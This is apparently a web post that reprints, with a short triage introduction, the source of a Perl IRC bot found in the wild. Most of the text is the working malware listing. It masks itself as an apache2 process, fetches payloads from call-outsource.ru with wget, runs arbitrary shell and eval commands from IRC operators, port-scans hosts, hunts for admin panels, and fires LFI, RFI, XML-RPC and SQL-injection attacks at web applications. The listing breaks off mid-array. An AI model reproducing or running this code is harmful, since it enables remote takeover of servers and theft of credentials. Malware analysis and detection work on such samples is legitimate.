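This Perl IRC bot was found in the wild, where it has been causing problems on servers here and there. It disguises itself as an Apache process by overwriting its process name with "/usr/sbin/apache2 -k start", sets its user-agent from a list of more than 60 different options, and attacks a wide range of web applications. For anyone triaging a suspect host, the listing shows what to check: the script changes into /tmp, fetches several files from call-outsource.ru with wget, ignores the INT, HUP and TERM signals, forks into the background, and then keeps an IRC connection open to receive commands. A process whose name claims to be apache2 but whose executable is perl is the giveaway.
The code is below: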
1: #!/usr/bin/perl2: ################################################3: use HTTP::Request; #4: use HTTP::Request::Common; #5: use HTTP::Request::Common qw(POST); #6: use LWP::Simple; #7: use LWP 5.64; #8: use LWP::UserAgent; #9: use Socket; #10: use IO::Socket; #11: use IO::Socket::INET; #12: use IO::Select; #13: use MIME::Base64; #14: ################################################15:16: my $datetime = localtime;17:18: my $Rondoeproc = "/usr/sbin/apache2 -k start";19: my $ircserver = $ARGV[0] unless $ircserver;20: my $ircport = $ARGV[1];21: my $nickname = $ARGV[2];22: my $ident = $ARGV[3];23: my $channel = '#'.$ARGV[4];24: my $admin = $ARGV[5];25: my $fullname = "Suwong Community";26:27: my $nob0dy = "154@9nobody15)";28: my $lfilogo = "15(4@11LFI15)";29: my $rfilogo = "15(4@11RFI15)";30: my $e107logo = "15(4@11e10715)";31: my $xmllogo = "15(4@11XML15)";32: my $sqllogo = "15(4@11SQL15)";33: my $oscologo = "15(4@11oSCo15)";34: my $zenlogo = "15(4@11ZEN15)";35: my $oplogo = "15(4@11OPEN15)";36: my $admlogo = "15(4@11PHP15)";37: my $smslogo = "15(4@11SMS15)";38: my $ossqllogo = "15(4@11OSCO-SQL15)";39: my $e107logosql = "15(4@11E107-SQL15)";40:41: my $lficmd = '!lfi';42: my $rficmd = '!rfi';43: my $e107cmd = '!e107';44: my $xmlcmd = '!xml';45: my $sqlcmd = '!mysql';46: my $oscocmd = '!osco';47: my $zencmd = '!zen';48: my $admcmd = '!adm';49: my $opcmd = '!op';50: my $ossqlcmd = '!oscmd';51: my $esqlcmd = '!sqle';52: my $Cyblfi = '!lfi2';53:54: my $cmdlfi = '!cmdlfi';55: my $cmde107 = '!cmde107';56: my $cmdxml = '!cmdxml';57:58: my $injector = "http://call-outsource.ru/logs/crew.jpg";59: my $botshell = "http://call-outsource.ru/logs/daster.jpg";60: my $botshell2 = "http://call-outsource.ru/logs/topi.jpg";61: my $botshell3 = "http://call-outsource.ru/logs/j1.txt";62: my $botshell4 = "http://call-outsource.ru/logs/j2.txt";63: my $cocok = "http://call-outsource.ru/logs/cocok.txt";64: my @domen = 
("site:.org","site:.net","site:.com","site:.au","site:.bg","site:.il","site:.ir","site:.br","site:.be","site:.biz","site:.ca","site:.cz","site:.de","site:.fr","site:.fi","site:.uk","site:.ru","site:.jp","site:.nl","site:.es","site:.sg","site:.tv","site:.my","site:.pt","site:.za","site:.co","site:.cc",65: "site:.it","site:.hu","site:.mx","site:.info","site:.pl","site:.vn","site:.us","site:.ua","site:.eu","site:.ch","site:.gr","site:.ro","site:.ar","site:.pd","site:.lt","site:.pr","site:.kr","Itemid,27","Itemid,37","Itemid,47","Itemid,57","Itemid,67","Itemid,87","Itemid,97","Itemid,107","Itemid,117");66:67: my @uagents = ("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6",68: "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)",69: "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511",70: "Seamonkey-1.1.13-1(X11; U; GNU Fedora fc 10) Gecko/20081112");71: "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)",72: "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)",73: "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)",74: "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)",75: "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)",76: "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)",77: "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",78: "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)",79: "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",80: "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)",81: "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)",82: "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)",83: "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",84: "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)",85: "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)",86: "Microsoft Pocket Internet Explorer/0.6",87: "Mozilla/4.0 (compatible; 
MSIE 4.01; Windows CE; PPC; 240x320)",88: "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;",89: "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)",90: "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)",91: "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)",92: "Advanced Browser (http://www.avantbrowser.com)",93: "Avant Browser (http://www.avantbrowser.com)",94: "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)",95: "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)",96: "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)",97: "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007",98: "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511",99: "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929",100: "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0",101: "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox",102: "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4",103: "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5",104: "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6",105: "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6",106: "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7",107: "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7",108: "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4",109: "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4",110: "Mozilla/5.0 (Windows; U; Windows 
NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5",111: "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1",112: "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1",113: "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1",114: "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1",115: "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1",116: "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2",117: "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0",118: "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b",119: "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0",120: "Mozilla/3.0 (OS/2; U)",121: "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)",122: "Mozilla/4.61 (Macintosh; I; PPC)",123: "Mozilla/4.61 [en] (OS/2; U)",124: "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)",125: "Mozilla/4.8 [en] (Windows NT 5.0; U)","Alcatel-OH5/1.0 UP.Browser/6.1.0.7.7 (GUI) MMP/1.0",126: "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Mobile/7D11",127: "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16",128: "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16",129: "Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5H11 Safari/525.20",130: "Mozilla/5.0 (iPod; U; CPU iPhone OS 3_1 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Mobile/7C106c",131: "Mozilla/5.0 (iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) 
Mobile/7D11",132: "Mozilla/5.0 (Linux; U; Android 2.1-update1; en-gb; Desire_A8181 Build/ERE27) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",133: "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) BlackBerry8707/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/150",134: "FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)",135: "Gigabot/3.0 (http://www.gigablast.com/spider.html)",136: "gsa-crawler (Enterprise; GID-01422; jplastiras@google.com)",137: "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12",138: "IlTrovatore-Setaccio/1.2 (http://www.iltrovatore.it/aiuto/faq.html)",139: "Mozilla/5.0 (Windows;U;Windows NT 5.1; l-PL;rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4",140: "Infoseek SideWinder/2.0B (Linux 2.4 i686)",141: "Mozilla/5.0 (X11;U;Linux i686 (x86_64);en-US;rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6",142: "Mozilla/5.0 (compatible;Baiduspider/2.0;+http://www.baidu.com/search/spider.html)",143: "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1",144: "Mozilla/5.0 (compatible;bingbot/2.0;+http://www.bing.com/bingbot.htm)",145: my $uagent = $uagents[rand(scalar(@uagents))];146: my $lfdtest = "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00";147: my $open_test = "/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html";148: my $adm_output = ("uid=");149: my $open_output = ("FCKeditor - Connectors Tests");150:151: my @tabele = ('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',152: 'name','names','nombre','nombres','usuarios','member','members','admin_table','miembro','miembros','membername','admins','administrator',153: 'administrators','passwd','password','passwords','pass','Pass','tAdmin','tadmin','user_password','user_passwords','user_name','user_names',154: 
'member_password','mods','mod','moderators','moderator','user_email','user_emails','user_mail','user_mails','mail','emails','email','address',155: 'e-mail','emailaddress','correo','correos','phpbb_users','log','logins','login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',156: 'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador','tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id',157: 'sistema_usuario','sistema_password','contrasena','auth','key','senha','tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member',158: 'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','membros','utilizadores','staff','nuke_authors','accounts','account','accnts',159: 'associated','accnt','customers','customer','membres','administrateur','utilisateur','tuser','tusers','utilisateurs','password','amministratore','god','God','authors',160: 'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members','Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');161: my @kolumny = ('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',162: 'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',163: 'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author',164: 'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',165: 'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',166: 'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');167: 
$SIG{'INT'} = 'IGNORE';168: $SIG{'HUP'} = 'IGNORE';169: $SIG{'TERM'} = 'IGNORE';170: $SIG{'CHLD'} = 'IGNORE';171: $SIG{'PS'} = 'IGNORE';172: chdir("/tmp");173: chop (my $priper = `wget http://call-outsource.ru/logs/crew.jpg -O crew.jpg;wget http://call-outsource.ru/logs/crew.jpg -O crew.jpg;wget http://call-outsource.ru/logs/daster.jpg -O daster.jpg;wget http://call-outsource.ru/logs/topi.jpg -O topi.jpg;wget http://call-outsource.ru/logs/j1.txt -O j1.txt;wget http://call-outsource.ru/logs/j2.txt -O j2.txt;wget http://call-outsource.ru/logs/cocok.txt -O cocok.txt`);174: $ircserver = "$ARGV[0]" if $ARGV[0];175: $0 = "$Rondoeproc"."\0" x 16;;176: my $pid = fork;177: exit if $pid;178: die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid);179:180: our %irc_servers;181: our %DCC;182: my $dcc_sel = new IO::Select->new();183: $sel_client = IO::Select->new();184: sub sendraw {185: if ($#_ == '1') {186: my $socket = $_[0];187: print $socket "$_[1]\n";188: } else {189: print $IRC_cur_socket "$_[0]\n";190: }191: }192:193: sub connector {194: my $mynick = $_[0];195: my $ircserver_con = $_[1];196: my $ircport_con = $_[2];197: my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);198: if (defined($IRC_socket)) {199: $IRC_cur_socket = $IRC_socket;200: $IRC_socket->autoflush(1);201: $sel_client->add($IRC_socket);202: $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";203: $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";204: $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;205: $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;206: nick("$mynick");207: my $versi = "-";208: sendraw("USER $ident ".$IRC_socket->sockhost." 
$ircserver_con :$versi");209: sleep (1);}}210: sub parse {211: my $servarg = shift;212: if ($servarg =~ /^PING \:(.*)/) {213: sendraw("PONG :$1");214: }215: elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {216: if (lc($1) eq lc($mynick)) {217: $mynick = $4;218: $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;219: }220: }221: elsif ($servarg =~ m/^\:(.+?)\s+433/i) {222: nick("$mynick".int rand(1));223: }224: elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {225: $mynick = $2;226: $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;227: $irc_servers{$IRC_cur_socket}{'nome'} = "$1";228: sendraw("MODE $mynick +i");229: sendraw("JOIN $channel");230: sleep(2);231: sendraw("PRIVMSG $admin :Hi $admin im here !!!");232: }233: }234: my $line_temp;235: while( 1 ) {236: while (!(keys(%irc_servers))) { &connector("$nickname", "$ircserver", "$ircport"); }237: select(undef, undef, undef, 0.01);;238: delete($irc_servers{''}) if (defined($irc_servers{''}));239: my @ready = $sel_client->can_read(0);240: next unless(@ready);241: foreach $fh (@ready) {242: $IRC_cur_socket = $fh;243: $mynick = $irc_servers{$IRC_cur_socket}{'nick'};244: $nread = sysread($fh, $ircmsg, 4096);245: if ($nread == 0) {246: $sel_client->remove($fh);247: $fh->close;248: delete($irc_servers{$fh});249: }250: @lines = split (/\n/, $ircmsg);251: $ircmsg =~ s/\r\n$//;252:253: if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) 
\:(.+)/) {254: my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5);255: my $engine ="GooGLe,ReDiff,Bing,ALtaViSTa,AsK,UoL,CluSty,GutSer,GooGle2,ExaLead,VirgiLio,WebDe,AoL,SaPo,DuCk,YauSe,BaiDu,KiPoT,GiBLa,YahOo,HotBot,LyCos,LyGo,BLacK,oNeT,SiZuka,WaLLa,DeMos,RoSe,SeZnaM,TisCali,NaVeR,AmiDalLa,BusCaR,KvaSiR,eXciTe,InteRia,SnZ,RambLer,YaNdeX,AllTheWeb,IxQuic,LiBero,mSn,GooDsEaRch,MaMmA,FiRebalL,WeBcRawLer";256: if ($path eq $mynick) {257: if ($msg =~ /^PING (.*)/) {258: sendraw("NOTICE $nick :PING $1");259: }260: if ($msg =~ /^VERSION/) {261: sendraw("NOTICE $nick :VERSION mIRC v6.17 Rondo");262: }263: if ($msg =~ /^TIME/) {264: sendraw("NOTICE $nick :TIME ".$datetime."");265: }266: if (&isAdmin($nick) && $msg eq "!die") {267: &shell("$path","kill -9 $$");268: }269: if (&isAdmin($nick) && $msg eq "!killall") {270: &shell("$path","killall -9 perl");271: }272: if (&isAdmin($nick) && $msg eq "!reset") {273: sendraw("QUIT :Lompat...");274: }275: if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {276: sendraw("JOIN #".$1);277: }278: if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {279: sendraw("PART #".$1);280: }281: if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) {282: sendraw("NICK ".$1);283: }284: if (&isAdmin($nick) && $msg =~ /^!pid/) {285: sendraw($IRC_cur_socket, "PRIVMSG $nick :9Rondoe Process/PID : $Rondoeproc - $$");286: }287: if (&isAdmin($nick) && $msg !~ /^!/) {288: &shell("$nick","$msg");289: }290: if (&isAdmin($nick) && $msg=~ /^$cmdlfi\s+(.*?)\s+(.*)/){291: my $url = $1.$lfdtest;292: my $cmd = $2;293: &cmdlfi($url,$cmd,$nick);294: }295: if (&isAdmin($nick) && $msg=~ /^$cmdxml\s+(.*?)\s+(.*)/){296: my $url = $1;297: my $cmd = $2;298: &cmdxml($url,$cmd,$nick);299: }300: if (&isAdmin($nick) && $msg=~ /^$cmde107\s+(.*?)\s+(.*)/){301: my $url = $1;302: my $cmd = $2;303: &cmde107($url,$cmd,$nick);304: }305: }306: else {307: if (&isAdmin($nick) && $msg eq "!die") {308: &shell("$path","kill -9 $$");309: }310: if (&isAdmin($nick) && $msg eq "!killall") {311: 
&shell("$path","killall -9 perl");312: }313: if (&isAdmin($nick) && $msg eq "!reset") {314: sendraw("QUIT :Lompat...");315: }316: if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {317: sendraw("JOIN #".$1);318: }319: if (&isAdmin($nick) && $msg eq "!part") {320: sendraw("PART $path");321: }322: if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {323: sendraw("PART #".$1);324: }325: if (&isAdmin($nick) && $msg =~ /^\.sh (.*)/) {326: &shell("$path","$1");327: }328: if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) {329: &shell("$path","$1");330: }331: if (&isAdmin($nick) && $msg =~ /^!eval (.*)/) {332: eval "$1";333: }334: ##################################################################### HIT335:336: if ($msg=~ /^$cmdlfi\s+(.+?)\s+(.*)/){337: my $url = $1.$lfdtest;338: my $cmd = $2;339: &cmdlfi($url,$cmd,$path);340: }341: if ($msg=~ /^$cmdxml\s+(.+?)\s+(.*)/){342: my $url = $1;343: my $cmd = $2;344: &cmdxml($url,$cmd,$path);345: }346: if ($msg=~ /^$cmde107\s+(.+?)\s+(.*)/){347: my $url = $1;348: my $cmd = $2;349: &cmde107($url,$cmd,$path);350: }351:352: ##################################################################### SMS353: if ($msg=~ /^!sms\s+(.*?)\s+(.*)/){354: my $no = $1;355: my $pesan = $2;356: if(sendSMS($no,$pesan)){357: &msg("$path","$smslogo 9Sukses mengirim ke 4 ".$no."9 Pengirim : 4 ".$nick);358: }359: else {360: &msg("$path","$smslogo 4 GAGAL!!");361: }362: }363:364: ##################################################################### HELP COMMAND365:366: if ($msg=~ /^!help/) {367: my $helplogo = "3(4@13HelP3)";368: &msg("$path","$helplogo 11 ########################4[ Suwong Community ]11############################");369: &msg("$path","$helplogo 8 ( $rficmd|$lficmd|$sqlcmd|$xmlcmd|$ossqlcmd|$esqlcmd [bug][dork])");370: &msg("$path","$helplogo 13 ( $cmde107|$cmdlfi|$cmdxml) [target][cmd]|!sms[no][pesan] )");371: &msg("$path","$helplogo 6 ( $e107cmd | $zencmd | $oscocmd | $admcmd | $opcmd [dork] ) ");sleep(2);372: &msg("$path","$helplogo 3 ( !login 
[web]|!port [ip][port]|!base64 [data]|!ip [ip]|!dns [host] )");373: &msg("$path","$helplogo 5 ( !about|!engine|!version|!proxy [3digit]|!paypal [email] )");374: &msg("$path","$helplogo 11 ######################4[ END HELP ]11#########################");375: }376: if ($msg=~ /^!engine/) {377: my $enginelogo = "15(4@9EnginE15)";378: &msg("$path","$enginelogo 4 GooGLe,ReDiff,Bing,ALtaViSTa,AsK,UoL,CluSty,GutSer,GooGle2,ExaLead,VirgiLio");379: &msg("$path","$enginelogo 4 WebDe,AoL,SaPo,DuCk,YauSe,BaiDu,KiPoT,GiBLa,YahOo,HotBot,LyCos,LyGo");380: &msg("$path","$enginelogo 4 BLacK,oNeT,SiZuka,WaLLa,DeMos,RoSe,SeZnaM,TisCali,NaVeR");381: }382: if ($msg=~ /^!about/) {383: my $aboutlogo = "15(4@9About15)";384: &msg("$path","$aboutlogo 12Suwong Community");385: &msg("$path","$aboutlogo 4CoDeD Jancok");386: &msg("$path","$aboutlogo 6MoD by Suwong Team");387: }388: if ($msg=~ /^!version/) {389: my $versionlogo = "15(4@9Version15)";390: &msg("$path","$versionlogo 12 priv8 SE v3.2");391: }392: if ($msg=~ /^!respon/ || $msg=~ /^!id/) {393: if (&isFound($injector,"R29hQ3JlVw==")) {394: &msg("$path","15(4@9Injector15)4 OFF!!!");395: } else {396: &msg("$path","15(4@9Injector15)8 OFF!!!");397: }398: }399: if (&isAdmin($nick) && $msg =~ /^!pid/) {400: ¬ice("$nick","9Rondoe Process/PID : 3$Rondoeproc - $$");401: }402: ##################################################################### TOOLS403: if ($msg=~ /^!proxy\s+(.+)/){404: if (my $pid = fork) { waitpid($pid, 0); } else {405: if (fork) { exit; } else {406: my $minta = $1;407: &msg("$path","15(4@9PROXY15)13 Checking Proxy..");408: &proxy($path,$minta);409: }410: exit;411: }412: }413:414: if ($msg=~ /^!dns\s+(.*)/){415: my $nsku = $1;416: $mydns = inet_ntoa(inet_aton($nsku));417: &msg("$path", "15(4@9DNS15) 13$nsku 9Resolve Ke 4 $mydns");418: }419:420: if ($msg=~ /^!port\s+(.*?)\s+(.*)/ ) {421: my $hostip= "$1";422: my $portsc= "$2";423: my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $portsc, Proto =>'tcp', 
Timeout => 7);424: if ($scansock) {425: &msg("$path","15(4@9PORT15)7 $hostip : $portsc 12Yes Cruutz");426: }427: else {428: &msg("$path","15(4@9PORT15)7 $hostip : $portsc 4connection refused");429: }430: }431:432: if ($msg=~ /^!ip\s+(.*)/ ) {433: if (my $pid = fork) { waitpid($pid, 0); } else {434: if (fork) { exit; } else {435: my $ip = $1;436: &msg("$path","15(4@9IP15)6 Searching ".$ip." 9Location ...");437: my $website = "http://www.ipligence.com/geolocation";438: my ($useragent,$request,$response,%form);439: undef %form;440: $form{ip} = $ip;441: $useragent = LWP::UserAgent->new;442: $useragent->timeout(5);443: $request = POST $website,\%form;444: $response = $useragent->request($request);445: if ($response->is_success) {446: my $res = $response->content;447: if ($res =~ m/Your IP address is(.*)<br>City:(.*)<br\/>Country:(.*)<br>Continent:(.*)<br>Time/g) {448: my ($ipaddress,$city,$country,$continent) = ($1,$2,$3,$4);449: &msg("$path","15(4@9IP15)13 IP Address : ".$ip." 9 ( ".$ipaddress." )");450: &msg("$path","15(4@9IP15)13 City : ".$ip." 9 ( ".$city." )");451: &msg("$path","15(4@9IP15)13 Country : ".$ip." 9 ( ".$country." )");452: &msg("$path","15(4@9IP15)13 Continent : ".$ip." 9 ( ".$continent." )");453: }454: else {455: &msg("$path","15(4@9IP15)13 ".$ip." 
4not found in database");456: }457: }458: else {459: &msg("$path","15(4@9IP15)4 Cannot open IP database.");460: }461: }462: exit;463: }464: }465:466: if ($msg=~ /^!base64 (.*)$/ ) {467: if (my $pid = fork) { waitpid($pid, 0); } else {468: if (fork) { exit; } else {469: my $hash = $1;470: my $base64_encoded = encode_base64($hash);471: my $base64_decoded = decode_base64($hash);472: &msg("$path","15(4@9BASE6415)13 Decode : 9$base64_decoded");473: &msg("$path","15(4@9BASE6415)13 Encode : 9$base64_encoded");474: }475: exit;476: }477: }478:479: if ($msg =~ /^!portscan (.*)$/ ) {480: my $hostip="$1";481: my @portas=("15","19","98","20","21","22","23","25","37","39","42","43","49","53","63","69","79","80","101","106","107","109","110","111","113","115","117","119","135","137","139","143","174","194","389","389","427","443","444","445","464","488","512","513","514","520","540","546","548","565","609","631","636","694","749","750","767","774","783","808","902","988","993","994","995","1005","1025","1033","1066","1079","1080","1109","1433","1434","1512","2049","2105","2432","2583","3128","3306","4321","5000","5222","5223","5269","5555","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","7001","7741","8000","8018","8080","8200","10000","19150","27374","31310","33133","33733","55555");482: my (@aberta, %porta_banner);483: &msg("$path","15(4@9PORTSCAN15) 13Loading port scanner.");484: foreach my $porta (@portas) {485: my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);486: if ($scansock) {487: push (@aberta, $porta);488: $scansock->close;489: }490: }491:492: if (@aberta) {493: &msg("$path", "15(4@9portscan15)13 open ports are...:5 @aberta");494: } else {495: &msg("$path","15(4@9portscan15)4 all ports are closed");496: }497: }498:499: if ($msg=~ /^!login (.*)$/ ) {500: if (my $pid = fork) { waitpid($pid, 0); } else {501: if (fork) { exit; } else {502: my $test = $1 ;503: @index = 
('/admin/','/ADMIN/','/login/','/adm/','/cms/','/administrator/','/admin/login.php','/ADMIN/login.php','/admin/log.php','/admin/controlpanel.html','/admin/controlpanel.php','/admin.php','/admin.html','/admin/cp.php','/admin/cp.html','/cp.php','/cp.html','/controlpanel/','/panelc/','/administrator/index.php','/administrator/login.html','/administrator/login.php','/administrator/account.html','/administrator/account.php','/administrator.php','/administrator.html','/login.php','/login.html','/controlpanel/','/administration/','/administration.php','/administration.html','/phpmyadmin/','/myadmin/','/wp-admin/','/webadmin/','/webadmin.php','/webadmin.html','/admins/','/admins.php','/admins.html','/WebAdmin/','/admin1/','/panel/','/cpanel/','/cPanel/','/members/','/wp-login/','/admin/','/ADMIN/','/login/','/adm/','/cms/','/administrator/','/admin/login.php','/ADMIN/login.php','/admin/log.php','/admin/controlpanel.html','/admin/controlpanel.php','/admin.php','/admin.html','/admin/cp.php','/admin/cp.html','/cp.php','/cp.html','/controlpanel/','/panelc/','/administrator/index.php','/administrator/login.html','/administrator/login.php','/administrator/account.html','/administrator/account.php','/administrator.php','/administrator.html','/login.php','/login.html','/controlpanel/','/administration/','/administration.php','/administration.html','/phpmyadmin/','/myadmin/','/wp-admin/','/webadmin/','/webadmin.php','/webadmin.html','/admins/','/admins.php','/admins.html','/WebAdmin/','/admin1/','/panel/','/cpanel/','/cPanel/','/members/','/wp-login/','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/','memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php','admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/
